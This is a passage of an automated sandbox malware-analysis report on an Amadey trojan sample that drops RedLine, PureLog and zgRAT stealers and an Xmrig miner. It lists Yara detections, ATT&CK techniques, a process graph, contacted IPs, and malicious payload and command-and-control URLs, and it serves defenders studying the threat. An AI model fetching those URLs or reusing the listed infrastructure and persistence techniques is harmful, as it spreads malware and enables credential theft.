                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F132A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_005F132A
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005E48B0 GetUserNameA,0_2_005E48B0
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005E98AE GetModuleHandleA,GetVersion,Sleep,std::_Throw_Cpp_error,0_2_005E98AE
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.1840252168.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4092, type: MEMORYSTR
                            Yara detected zgRAT
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY

                            Remote Access Functionality

                            barindex
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.1840252168.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4092, type: MEMORYSTR
                            Yara detected zgRAT
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fbb9d4.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.f363d4.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fe518c.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.f20000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: FRaqbC8wSA1XvpFVjCRGryWt.exe PID: 6680, type: MEMORYSTR
                            Source: Yara matchFile source: C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\b1s7nlT2NqFJ3sl3xbYiMCIq.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\yt3cew8k69RKLpgTFur2iz2M.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                            Windows Management Instrumentation                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Disable or Modify Tools                            		11
                            Input Capture                            		1
                            System Time Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Native API                            		1
                            Scheduled Task/Job                            		512
                            Process Injection                            		11
                            Deobfuscate/Decode Files or Information                            		LSASS Memory1
                            Account Discovery                            		Remote Desktop Protocol11
                            Input Capture                            		1
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            Scheduled Task/Job                            		21
                            Registry Run Keys / Startup Folder                            		1
                            Scheduled Task/Job                            		3
                            Obfuscated Files or Information                            		Security Account Manager1
                            File and Directory Discovery                            		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                            Registry Run Keys / Startup Folder                            		11
                            Software Packing                            		NTDS145
                            System Information Discovery                            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets1
                            Query Registry                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Masquerading                            		Cached Domain Credentials461
                            Security Software Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Modify Registry                            		DCSync2
                            Process Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job261
                            Virtualization/Sandbox Evasion                            		Proc Filesystem261
                            Virtualization/Sandbox Evasion                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt512
                            Process Injection                            		/etc/passwd and /etc/shadow1
                            Application Window Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                            Hidden Users                            		Network Sniffing1
                            System Owner/User Discovery                            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1479881 Sample: RPHbzz3JqY.exe Startdate: 24/07/2024 Architecture: WINDOWS Score: 100 102 Sigma detected: Xmrig 2->102 104 Malicious sample detected (through community Yara rule) 2->104 106 Antivirus / Scanner detection for submitted sample 2->106 108 12 other signatures 2->108 9 explert.exe 25 2->9         started        14 RPHbzz3JqY.exe 1 4 2->14         started        16 Cerker.exe 2->16         started        18 8 other processes 2->18 process3 dnsIp4 96 185.196.10.57 SIMPLECARRIERCH Switzerland 9->96 98 185.216.214.218 SERVERDISCOUNTERserverdiscountercomDE Germany 9->98 100 188.114.96.3 CLOUDFLARENETUS European Union 9->100 72 C:\ProgramData\yt3cew8k69RKLpgTFur2iz2M.exe, PE32 9->72 dropped 86 17 other malicious files 9->86 dropped 136 Creates an undocumented autostart registry key 9->136 20 IIZS2TRqf69aZbLAX3cf3edn.exe 18 9 9->20         started        24 HM3SOlbpH71yEXUIEAOeIiGX.exe 9->24         started        26 FRaqbC8wSA1XvpFVjCRGryWt.exe 9->26         started        32 14 other processes 9->32 74 C:\Users\user\AppData\Local\...\explert.exe, PE32 14->74 dropped 76 C:\Users\user\...\explert.exe:Zone.Identifier, ASCII 14->76 dropped 138 Creates multiple autostart registry keys 14->138 140 Contains functionality to inject code into remote processes 14->140 142 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->142 144 Uses schtasks.exe or at.exe to add and modify task schedules 14->144 28 explert.exe 14->28         started        30 schtasks.exe 1 14->30         started        78 C:\Users\user\AppData\...\sys_updater.exe, PE32 16->78 dropped 80 C:\Users\user\AppData\...\sys_updater.exe, PE32 18->80 dropped 82 C:\Users\user\AppData\...\sys_updater.exe, PE32+ 18->82 dropped 84 C:\Users\user\AppData\...\sys_updater.exe, PE32 18->84 dropped 88 3 other malicious files 18->88 dropped 146 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->146 file5 signatures6 process7 file8 64 C:\Users\user\AppData\...\sys_updater.exe, PE32+ 20->64 dropped 66 C:\Users\user\AppData\Local\Temp\gtxkvh.exe, PE32 20->66 dropped 118 Multi AV Scanner detection for dropped file 20->118 120 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 20->120 122 Writes to foreign memory regions 20->122 132 2 other signatures 20->132 34 gtxkvh.exe 20->34         started        38 AddInProcess.exe 20->38         started        41 AddInProcess.exe 20->41         started        68 C:\Users\user\AppData\Roaming\d3d9.dll, PE32 24->68 dropped 124 Antivirus detection for dropped file 24->124 126 Machine Learning detection for dropped file 24->126 128 Allocates memory in foreign processes 24->128 43 MSBuild.exe 24->43         started        45 conhost.exe 24->45         started        130 Contains functionality to hide user accounts 26->130 47 conhost.exe 30->47         started        49 conhost.exe 32->49         started        signatures9 process10 dnsIp11 60 C:\Users\user\AppData\...\sys_updater.exe, PE32 34->60 dropped 62 C:\Users\user\AppData\Local\...\Cerker.exe, PE32 34->62 dropped 110 Creates an undocumented autostart registry key 34->110 112 Creates multiple autostart registry keys 34->112 51 Cerker.exe 34->51         started        56 schtasks.exe 34->56         started        92 212.47.253.124 OnlineSASFR France 38->92 114 Query firmware table information (likely to detect VMs) 38->114 94 146.59.154.106 OVHFR Norway 41->94 116 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 43->116 file12 signatures13 process14 dnsIp15 90 188.114.97.3 CLOUDFLARENETUS European Union 51->90 70 C:\Users\user\AppData\...\sys_updater.exe, PE32 51->70 dropped 134 Creates an undocumented autostart registry key 51->134 58 conhost.exe 56->58         started        file16 signatures17 process18

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            RPHbzz3JqY.exe61%ReversingLabsWin32.Trojan.Amadey
                            RPHbzz3JqY.exe57%VirustotalBrowse
                            RPHbzz3JqY.exe100%AviraHEUR/AGEN.1319014
                            RPHbzz3JqY.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe100%AviraHEUR/AGEN.1319014
                            C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe100%AviraHEUR/AGEN.1310947
                            C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe100%Joe Sandbox ML
                            C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe100%Joe Sandbox ML
                            C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe83%ReversingLabsByteCode-MSIL.Ransomware.RedLine
                            C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe76%VirustotalBrowse
                            C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe83%ReversingLabsWin64.Trojan.Casdet
                            C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe74%VirustotalBrowse

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            No Antivirus matches

                            Domains and IPs

                            Contacted Domains

                            No contacted domains info

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://cacerts.digicert.cUIIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2163427307.00000234D5BBC000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2171457608.00000234D5AB9000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2651808657.0000021E0314C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2668665930.0000021E0343C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2746248549.00000159F356C000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2768752871.00000159F3574000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2940578009.0000020E494EB000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2892087005.0000020E4948C000.00000004.00000020.00020000.00000000.sdmpfalse
                              https://solutionhub.cc/A;sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                http://185.196.10.57/selectex-file-host/acev.exeuexplert.exe, 00000004.00000003.1829245052.0000000001424000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1847987081.0000000001424000.00000004.00000020.00020000.00000000.sdmpfalse
                                  http://www.fontbureau.com/designersGMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    https://solutionhub.cc/~explert.exe, 00000004.00000003.1848114752.00000000013DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      http://www.fontbureau.com/designers/?MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        http://www.founder.com.cn/cn/bTheMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          http://185.196.10.57/selectex-file-host/Support.exeyexplert.exe, 00000004.00000003.2114234135.000000000142F000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.2801052059.000000000142F000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F35EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            http://www.fontbureau.com/designers?MSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              http://www.microsoft.cjexplert.exe, 00000004.00000003.1712362816.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, explert.exe, 00000004.00000003.1712419900.0000000001407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                https://solutionhub.cc/$;IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  https://api.msn.com:443/v1/news/Feed/Windows?IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2172293908.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2165069693.00000234D5BB1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2670749256.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2655069424.0000021E03431000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2772816830.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2750695258.00000159F3560000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2945215932.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2895586429.0000020E49481000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    https://docs.rs/getrandom#nodejs-es-module-supportsys_updater.exe.26.drfalse
                                                      http://crl.microsoft.ca8IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2954321429.0000020E49515000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001F.00000003.2916180807.0000020E494AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        http://www.tiro.comMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          https://solutionhub.cc:443/socket/IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2176730620.00000234D5AD3000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2167400204.00000234D5BE7000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2658110747.0000021E0344A000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 00000018.00000003.2684596327.0000021E03442000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2777007339.00000159F358D000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2757593840.00000159F35A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            https://api.ip.sMSBuild.exe, 0000000C.00000002.1842346912.0000000002E61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              http://www.fontbureau.com/designersMSBuild.exe, 0000000C.00000002.1848530949.0000000006FA2000.00000004.00000800.00020000.00000000.sdmpfalse
